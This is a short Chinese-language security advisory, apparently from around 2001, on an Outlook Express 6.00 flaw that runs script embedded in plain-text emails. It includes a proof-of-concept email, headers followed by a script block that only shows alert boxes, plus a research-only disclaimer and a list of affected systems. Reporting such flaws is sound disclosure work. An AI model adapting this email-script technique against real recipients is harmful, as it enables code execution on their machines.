Outlook Express 6.00 可执行脚本代码漏洞
/ns/ld/softld/data/20010926102936.htm
正常情况下,只有 html 邮件[Content-Type: text/html]才会解析 html 和脚本代码。但是在最新推出的 Outlook Express 6.00 中,纯文本邮件中如果加入了脚本代码,它们也会被解释执行。攻击者有可能利用该漏洞发送一段恶意的代码到受影响的服务器,将可能获得受影响系统中的权限。
缺省情况下,Outlook Express 6.00禁止脚本执行,因此缺省情况下用户不会受此问题影响。
以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负
发送下列的纯文本邮件也会导致执行脚本:
MIME-Version: 1.0
Content-Type: text/plain;
charset="Windows-1252"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
X-Source: 11.09.01 http://www.malware.com
<script>alert("freak");alert("show")</script>
受影响的系统:
Outlook Express 6.00
- Microsoft Windows 9x
- Microsoft Windows NT 4.0
- Microsoft Windows 2000